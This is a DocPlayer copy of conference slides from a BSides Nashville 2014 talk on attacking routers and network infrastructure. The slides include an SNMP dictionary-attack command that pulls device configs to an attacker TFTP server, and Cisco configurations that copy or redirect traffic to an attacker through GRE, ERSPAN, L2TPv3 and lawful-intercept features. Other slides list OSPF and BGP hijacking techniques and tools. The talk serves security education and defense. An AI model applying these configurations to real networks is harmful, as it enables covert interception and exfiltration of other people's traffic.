BSides Nashville 2014



Similar documents
Defending the Enterprise Against Network Infrastructure Threats. DefCamp Paul Coggin Senior Principal Cyber Security

IOS NAT Load Balancing for Two ISP Connections

GregSowell.com. Mikrotik Routing

GregSowell.com. Intro to Networking Mikrotik/Cisco

Exploiting First Hop Protocols to Own the Network. Rocket City TakeDownCon Paul Coggin Senior Principal Cyber Security

co Sample Configurations for Cisco 7200 Broadband Aggreg

Cisco Certified Network Associate Exam. Operation of IP Data Networks. LAN Switching Technologies. IP addressing (IPv4 / IPv6)

Cisco Certified Network Associate (CCNA) 120 Hours / 12 Months / Self-Paced WIA Fee: $

Networking. Palo Alto Networks. PAN-OS Administrator s Guide Version 6.0. Copyright Palo Alto Networks

Course Contents CCNP (CISco certified network professional)

CCT vs. CCENT Skill Set Comparison

Note: This case study utilizes Packet Tracer. Please see the Chapter 5 Packet Tracer file located in Supplemental Materials.

Implementing Secured Converged Wide Area Networks (ISCW) Version 1.0

: Interconnecting Cisco Networking Devices Part 1 v2.0 (ICND1)

Multi-Homing Security Gateway

IOS NAT Load Balancing with Optimized Edge Routing for Two Internet Connections

Why Is MPLS VPN Security Important?

Interconnecting Cisco Networking Devices Part 2

1 Data information is sent onto the network cable using which of the following? A Communication protocol B Data packet

Supporting Document PPP

Interconnecting Cisco Networking Devices: Accelerated (CCNAX) 2.0(80 Hs) 1-Interconnecting Cisco Networking Devices Part 1 (40 Hs)

Chapter 3 LAN Configuration

OSPF Configuring Multi-Area OSPF

Unicast Reverse Path Forwarding

IPv4/IPv6 Transition Mechanisms. Luka Koršič, Matjaž Straus Istenič

Configuring the Transparent or Routed Firewall

Example: Advertised Distance (AD) Example: Feasible Distance (FD) Example: Successor and Feasible Successor Example: Successor and Feasible Successor

Router configuration manual for I3 Micro Vood 322

UIP1868P User Interface Guide

Tech Note Cisco IOS SNMP Traps Supported and How to Conf

Route Discovery Protocols

SSVP SIP School VoIP Professional Certification

Course Overview: Learn the essential skills needed to set up, configure, support, and troubleshoot your TCP/IP-based network.

JOB READY ASSESSMENT BLUEPRINT COMPUTER NETWORKING FUNDAMENTALS - PILOT. Test Code: 4514 Version: 01

SSVVP SIP School VVoIP Professional Certification

This page displays the device information, such as Product type, Device ID, Hardware version, and Software version.

Introduction about cisco company and its products (network devices) Tell about cisco offered courses and its salary benefits (ccna ccnp ccie )

Provisioning Cable Services

CompTIA Exam N CompTIA Network+ certification Version: 5.1 [ Total Questions: 1146 ]

How To Learn Cisco Cisco Ios And Cisco Vlan

< Introduction > This technical note explains how to connect New SVR Series to DSL Modem or DSL Router. Samsung Techwin Co., Ltd.

CCNA2 Chapter 11 Practice

Configure A VoIP Network

IMPLEMENTING CISCO IP ROUTING V2.0 (ROUTE)

"Charting the Course...

Interconnecting Cisco Network Devices 1 Course, Class Outline

Basic Network Configuration

Transport and Network Layer

Implementing MPLS VPNs over IP Tunnels on Cisco IOS XR Software

Cisco CCNP Implementing Secure Converged Wide Area Networks (ISCW)

Networking 4 Voice and Video over IP (VVoIP)

VOIP-211RS/210RS/220RS/440S. SIP VoIP Router. User s Guide

COURSE AGENDA. Lessons - CCNA. CCNA & CCNP - Online Course Agenda. Lesson 1: Internetworking. Lesson 2: Fundamentals of Networking

IP Routing Configuring RIP, OSPF, BGP, and PBR

Building Secure Network Infrastructure For LANs

CCNA 2 v5.0 Routing Protocols Final Exam Answers

Chapter 8 Router and Network Management

: Interconnecting Cisco Networking Devices Part 2 v1.1

WAN Failover Scenarios Using Digi Wireless WAN Routers

Chapter 8 Advanced Configuration

Configuration IP Routing and Multicast Avaya Ethernet Routing Switch 4500 Series

Datagram-based network layer: forwarding; routing. Additional function of VCbased network layer: call setup.

Cisco Discovery 3: Introducing Routing and Switching in the Enterprise hours teaching time

Network Scenarios Pagina 1 di 35

PPTP Server Access Through The

Textbook Required: Cisco Networking Academy Program CCNP: Building Scalable Internetworks v5.0 Lab Manual.

Configuring Network Address Translation (NAT)

Elfiq Link Load Balancer Frequently Asked Questions (FAQ)

MPLS VPN Security BRKSEC-2145

Task 20.1: Configure ASBR1 Serial 0/2 to prevent DoS attacks to ASBR1 from SP1.

The Product Description of SmartAX. MT882 ADSL2+ Router

Broadband Phone Gateway BPG510 Technical Users Guide

Understanding Virtual Router and Virtual Systems

IP Networking. Overview. Networks Impact Daily Life. IP Networking - Part 1. How Networks Impact Daily Life. How Networks Impact Daily Life

LAN TCP/IP and DHCP Setup

Internet Access Setup

Implementing MPLS VPNs over IP Tunnels

Router and Routing Basics

BGP: Border Gateway Protocol

Configuring SNA Frame Relay Access Support

Chapter 4 Customizing Your Network Settings

Innominate mguard Version 6

Configuring Static and Dynamic NAT Simultaneously

MPLS. Cisco MPLS. Cisco Router Challenge 227. MPLS Introduction. The most up-to-date version of this test is at:

Cisco Networking Professional-6Months Project Based Training

The Cisco IOS Firewall feature set is supported on the following platforms: Cisco 2600 series Cisco 3600 series

Route Optimization. rek Petr Grygarek, VSB-TU Ostrava, Routed and Switched Networks 1

Outline. CSc 466/566. Computer Security. 18 : Network Security Introduction. Network Topology. Network Topology. Christian Collberg

Internet Infrastructure Security Technology Details. Merike Kaeo

INTERCONNECTING CISCO NETWORK DEVICES PART 1 V2.0 (ICND 1)

Firewall Defaults and Some Basic Rules

IP Routing Features. Contents

TCP/IP Basis. OSI Model

How To Make A Network Secure

Cisco Certified Network Professional (CCNP Routing & Switching)

C2-010/C2-010-I ADSL2+ Router

IT-AD08: ADD ON DIPLOMA IN COMPUTER NETWORK DESIGN AND INSTALLATION

Transcription:

Bending and Twisting Networks BSides Nashville 2014 Paul Coggin Internetwork Consulting Solutions Architect @PaulCoggin www.dynetics.com V## Goes Here 1

SNMP Blow Defeat SNMP w/ ACL $ snmpblow.pl -s <NetMgt IP> -d <Target IP> -t <TFTP IP> -f cfg.txt < communities.txt Attacker Network Target Network Internet SNMP Dictionary Attack with IP spoof R&S SNMP ACL Filtered TFTP Server Upon guessing the SNMP community string the configuration file is downloaded to the attacker TFTP server Trusted Device Layer 2 and L3 Anti-spoof protection with a complex SNMP community string is recommended. SNMPv3 is highly encouraged. Reference: http://www.scanit.be/en_us/snmpblow.html 2

Policy Routing Override IP Routing Table ISP A Internet ISP B -Comprised A Route Map can over ride IP routing table and redirect specific traffic flows Scenario 1 Redirect Outbound Internet Rouge 4G router Scenario 2 Redirect Traffic of interest out 4G or other RF network for undetected exfiltration Si Scenario 3 Redirect Traffic of interest to enable a layer 3 Man in the Middle Attack Attacker System - Packet Sniffer - IP Forwarding Vlan 2 Vlan 3 Vlan 4 Reference http://ptgmedia.pearsoncmg.com/images/1587052024/samplechapter/1587052024content.pdf 3

GRE Tunnel Utilized to Sniff Across WAN Target Network Hacked Router Internet Attacker Network Packet Analyzer - GRE Tunnel is configured on the hacked router and the attacker s router - GRE Tunnel interfaces must be in common subnet - Configure ACL to define traffic of interest on the hacked router - Define a route map with the ACL and set the next hop to the attacker s GRE tunnel interface IP address - Similarly define an ACL & route map on the attacker router to redirect traffic to the packet analyzer Reference: http://www.symantec.com/connect/articles/cisco-snmp-configuration-attack-gre-tunnel 4

ERSPAN Enable Packet Capture Across Routed Network Target Network Hacked Router Internet Attacker Network Exfiltration of packet captures ERSPAN sends traffic over a GRE tunnel Packet Analyzer monitor session < session ID > type erspan-source source interface GigabitEthernet1/0/1 rx source interface GigabitEthernet1/0/2 tx source interface GigabitEthernet1/0/3 both destination erspan-id < erspan-flow-id > ip address < remote ip > origin ip address < source IP > monitor session < session ID > type erspan-destination Source ip address < source IP > erspan-id < erspan-flow-id > destination interface GigabitEthernet2/0/1 References: http://www.cisco.com/en/us/docs/ios/ios_xe/lanswitch/configuration/guide/span_xe.pdf 5

DLSw Overview IBM Controller SDLC IBM Mainframe or AS 400 dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 interface Serial0/0 Ip address 192.168.1.2 255.255.255.0 interface Ethernet0/0 ip address 192.168.2.1 255.255.255.0 interface Serial0/1 description IBM controller configuration no ip address no ip directed-broadcast encapsulation sdlc no keepalive clockrate 56000 sdlc role prim-xid-poll sdlc vmac 0030.0000.8100 sdlc address C0 sdlc partner 4000.80c0.4040 C0 sdlc dlsw C0 bridge 1 protocol ieee IPv4 Routed Backbone DLSw is used to tunnel SNA and Netbios over IP dlsw local-peer peer-id 192.168.3.1 dlsw remote-peer 0 tcp promiscuous dlsw bridge-group 1 Interface serial0/0 Ip address 192.168.1.1 255.255.255.0 interface ethernet 0/0 ip address 192.168.3.1 255.255.255.0 bridge-group 1 bridge 1 protocol ieee References: http://www.cisco.com/en/us/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/us/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavrd 6

Tunnel IPv6 over IPv4 using DLSw If a router can be compromised with software that supports DLSw a host may be able to tunnel IPv6 traffic across the IPv4 routed Internet. This is not a documented or supported capability by Cisco. dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 interface Serial0/0 Ip address 192.168.1.2 255.255.255.0 interface FastEthernet0/0 ip address 192.168.2.1 255.255.255.0 bridge-group 1 bridge 1 protocol ieee IPv4 Routed Backbone dlsw local-peer peer-id 192.168.3.1 dlsw remote-peer 0 tcp promiscuous dlsw bridge-group 1 Interface serial0/0 Ip address 192.168.1.1 255.255.255.0 Interface FastEthernet 0/0 ip address 192.168.3.1 255.255.255.0 bridge-group 1 bridge 1 protocol ieee References: http://www.cisco.com/en/us/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/us/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavrd 7

L2TPv3 Overview Pseudo-wire Layer 2 Connection Across Service Provider WAN L2TPv3 Tunnel CE PE P PE CE Tunnel DSL PPPoE Subscribers Across the Service Provider Infrastructure for Termination at a Third Party Service Provider Wholesale DSL Busiess Model 8

Target Network Hacked Router PE L2TPv3 MITM Across the Internet Internet PE Attacker Network 2.2.2.2 1.1.1.1 L2TPv3 Tunnel ARP Poison across the Internet Common Layer 2 Network l2tp-class l2tp-defaults retransmit initial retries 30 cookie-size 8 pseudowire-class ether-pw encapsulation l2tpv3 protocol none ip local interface Loopback0 interface Ethernet 0/0 xconnect 2.2.2.2 123 encapsulation l2tpv3 manual pw-class ether-pw l2tp id 222 111 l2tp cookie local 4 54321 l2tp cookie remote 4 12345 l2tp hello l2tp-defaults l2tp-class l2tp-defaults retransmit initial retries 30 cookie-size 8 pseudowire-class ether-pw encapsulation l2tpv3 protocol none ip local interface Loopback0 interface Ethernet 0/0 xconnect 1.1.1.1 123 encapsulation l2tpv3 manual pw-class ether-pw l2tp id 222 111 l2tp cookie local 4 54321 l2tp cookie remote 4 12345 l2tp hello l2tp-defaults Reference: http://www.cisco.com/en/us/docs/ios-xml/ios/wan_lserv/configuration/xe-3s/asr1000/wan-l2-tun-pro-v3-xe.pdf 9

Lawful Intercept Overview Voice-Call Agent Data-Radius, AAA Configuration Commands Intercepting Control Element (ICE) Router \ Switch Service Provider Request IRI Request LI Administration Function Mediation Device Content Mediation Device Law Enforcement Agency (LEA) Collection Function SNMPv3 UDP Transport for Delivery Reference: http://www.cisco.com/en/us/docs/switches/lan/catalyst6500/ios/12.2sx/lawful/intercept/65li.pdf http://www.cisco.com/en/us/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf 10

Lawful Intercept Identify Physical Source of Traffic DHCP request DHCP request with sub ID in Option identifier (RFC 3046) DHCP response with IP address MAC A Ethernet Access Domain MAC B MAC C DSL CPE ADSL modem IP DSLAM PE-AGG L3VPN-PE ISP DHCP Server Example Enterprise Network DHCP with Option 82 Support DHCP Option 82 provides the DSLAM and Switch Name and the Physical Interface That Requested a DHCP IP Address 11

Lawful Intercept Exploit Scenario Target Network Hacked Router Internet Destination Network LI SNMP Trap Attacker Network Duplicate Copy of All Packets of Interest Packet Analyzer Snmp-server view <view-name> ciscotap2mib included Snmp-server view <view-name> ciscoiptapmib included Snmp-server group <group-name> v3 auth read <view-name> write <view-name) notify <view-name> Snmp-server host <ip-address> traps version 3 priv <username> udp-port <port-number> Snmp-server user <mduser-id> <groupname> v3 auth md5 <md-password> References: http://www.cisco.com/en/us/docs/switches/lan/catalyst6500/ios/12.2sx/lawful/intercept/65li.pdf http://www.cisco.com/en/us/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf 12

Two-way Connection via NAT Pivot to Target Cloud Provider Managed IPTV Service Provider Attacking System Internet IPTV Head End Default Route (MCAST RPF) Billing System Integration Target is the SAT IPTV Head End. Attacker is trying to pivot from Service Provider Network. Servers have route pointing back to SAT with no route to Internet. If the attacker can compromise the HE router then configure NAT two-way communication to the servers can be established. TV C M STB Message On- Line Network Menu Guide Ch Up Select Power NLC 3 Ch Dn Fiber Node SM downstream upstream RF Combiner Routers Cable Modem Termination System (CMTS) Cable Routers Head End Router Multicast Video Setup Static NAT Translation No Route Middleware IPTV Video On Demand Services Pivot off Servers and Exploit Trust to target Cloud IPTV Provider 13

OSPF Overview - OSPF runs the SPF Algorithm - OSPF advertises updates, routes etc with LSA s - Routes determined based on link cost - Clear / MD5 Authentication Autononynmous System Border Router (ASBR) External Networks RIP, EIGRP, BGP, ISIS Area 0 Area 1 Area Border Router (ABR) ABR Area 2 Reference: http://www.cisco.com/en/us/tech/tk365/technologies_white_paper09186a0080094e9e.shtml 14

Hack the Network via OSPF DR External Network BGP, EIGRP, ISIS Area 1 BDR Autononynmous System Border Router (ASBR) Area Border Router (ABR) Area 0 ABR Area 2 OSPF Exploit Tools - Quagga - NRL Core(Network Simulator) - Nemesis - Loki - G3SN\Dynamips - Buy a router on ebay - Hack a router and reconfigure - Code one with Scapy - IP Sorcery( IP Magic) - Cain & Able to crack OSPF MD5 - MS RRAS - NetDude - Collasoft - Phenoelit IRPAS OSPF typically is implemented without any thought to security. LSA s are mul@cast on the spoke LAN for any user to sniff without MD5. OSPF Attack Vectors - Take over as DR - Inject routes to mask source of attack - DoS - Inject routes for MITM - Add new routes to hacked router - Change interface bandwidth or use IP OSPF Cost for Traffic Engineering on hacked router 15

BGP Overview Route Reflector AS 1 Route Reflector IBGP L2 Cross Connect AS 2 AS 3 AS 4 References: http://www.cisco.com/en/us/tech/tk365/technologies_tech_note09186a00800c95bb.shtml#howbgpwork http://www.cisco.com/en/us/tech/tk365/tk80/tsd_technology_support_sub-protocol_home.html?referring_site=bodynav 16

BGP Layer 2 Cross Connect Attacks Route Reflector AS 1 Route Reflector - ARP Poisoning - DoS - Route Injection - How about a ERSPAN information leakage, L2Tpv3 or Lawful Intercept? L2 Cross Connect IBGP ERSPAN Destination AS 4 AS 2 AS 3 AS 5 Packet Analysis 17

BGP Hijack IP Network AS 5 Hijack IP subnet /24 Route Reflector AS 1 Route Reflector AS 6 IBGP AS 7 L2 Cross Connect AS 2 AS 3 AS 4 The Longest IP Prefix Wins 18

BGP IP Network and AS Hijacking AS 5 Route Reflector AS 1 Route Reflector AS 6 IBGP AS 2 Hijack AS 4 & IP subnet /24 L2 Cross Connect AS 3 AS 4 The Longest IP Prefix Wins 19

Questions??? Contact info @PaulCoggin 20

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information